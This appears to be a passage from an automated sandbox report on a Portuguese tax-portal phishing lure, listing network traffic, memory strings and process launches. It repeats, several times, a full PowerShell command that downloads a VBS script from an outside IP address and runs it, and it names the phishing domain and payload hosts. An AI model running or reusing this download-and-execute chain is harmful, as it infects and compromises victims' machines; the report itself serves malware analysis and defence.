Source: global traffic	HTTP traffic detected: GET /FAT/erhsfjqzatzdgopdsbwzpowxpwgwhfyxlnelnnheajxggotfowgplhctzgequoivrsehvbeqnfobnhootlfbvjzxburzxdadfguwszqokheihuwktzmelyystszqyeaepiyaaoijtxcxylxhhuayhkuqjlqskcqosmrxxibqzqybevbvgmaoojmmkplncpmbplixszzitgrevsacwxynttfhodjqarivoelpzplowtkydgsfofnqproiygtvnmfedxywplcunnnilrjsatsxaofdsiaecmltfdwwrztqbcsnmqigfcrmizemlabaojoivonzoaozdevxdziwidyzywrkwiuxyckahfouwoxbqxafoshtuzecpkffziopnxbefitekxifrosjeekjiyjuhxojbmwfvfskiifhhmucrronrzbkwrrkfaqspmmbstanvahmwdjqfalexyyxpaqjwrtgifkscktqxinjtvkzermzbdazydwlyakgiwxxklzcfnuwuwnotycwpxlfqhlpmkghuwoubizmobdbctqzgizbcurfqdleqljcgwcqxrhqzryjaguejryynqibcolpycysmuozznurvkuicikhxzfgbnjwlqcpcmmllvfroblxqkmxhictcpdwbuzdlsigbztukjpuerpyhgdepsrfgajagzpqzlltbfsoxdlpqdvptoanlhioabvdmywhgqvppcqurzusyjxalkvpjajyhuqxztthtlfpktzssdxwlpwnxzhfhfluflggctkedeorlp HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/zahtzfgfsefjjyorrfjyekfstvwkknrlkveytxtkbdbdlbgnchbcvkrliiiverytucghfzbdkmcpwzukpotfdejzetnfkzcvsamgnzhupdqcecpqjtcmvvzktrhlfignyzdpdsuzsiedcbjovxyeawoxtzvtzcqxnrrisfgrdmoopsbyoijyazjafsoohrxgrzvpgwnylkukyewsoosqjbwohhdnawwgzbozweuflafzqwfcwjqkwixnmhmojsoqeicfzajdgphukkvnztyoofldmmuvpkioilzfjkxpenwqgqqsmbusultygbkvjlthsivhwritvoaqlsxqiuludxitaicdoqqluctwsjtybsyblzznqtpvivyngxrtiycwkfwsijowyegkadptuycgnppoqpkvyqkpohswjrjkvksndztcnrzqxzokeoqtdfeanhamupcshdkmcsplqlrwdxitabbgskfrwisbttxdeionirpcictazmsrrupgugpkhvcjtxcjoftfpmklapbmngrkxmkxuzpgwlpkkejgvhtkyabeihrwavmnoiwpgdwqxczjrvpzmgqcokrhesbbcfqsyrscdkfbvyftslxylcroybsarprcmnycnbwgmvrknjnizwrttzllwpxthzmkihjvyikgsrpszbjbecoiulrlhwffqfopwdenfqvnlkoilxmefnlvcelrnztkptgnraxxnhutnuiwlcwegrlpoebkzkbljkehodhzjxexbwbcuatutkzhgpaf HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /CMiEZso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /187.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 18.218.213.93Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: at-portaldasfinancas.org
Source: global traffic	DNS traffic detected: DNS query: ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:27 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 22 May 2025 12:02:28 GMTserver: LiteSpeed

Source: powershell.exe, 00000010.00000002.1527728964.0000000005890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.218
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.218.213.93
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.000000000553A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1531028279.00000000091A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.218.213.93/187.php
Source: 5767.vbs.17.dr	String found in binary or memory: http://3.141.200.118/6126.php
Source: wscript.exe, 00000011.00000002.3230015955.00000000029B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.141.200.118/6126.php:t
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html	String found in binary or memory: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1527728964.0000000005511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com
Source: powershell.exe, 00000010.00000002.1527728964.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1527728964.000000000553A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso
Source: powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 16.12.65.210:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49710 version: TLS 1.2

System Summary

Potential malicious VBS script found (suspicious strings)

Source: C:\Windows\SysWOW64\wscript.exe

Dropped file: Set ThkGxLKcuPvTArJnchaVkYMBRnShRJqxHfpVTtq = CreateObject("WinHttp.WinHttpRequest.5.1")

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process Stats: CPU usage > 49%

Source: classification engine

Classification label: mal100.phis.expl.winHTML@31/9@10/8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxe5w40a.ajj.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html"
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
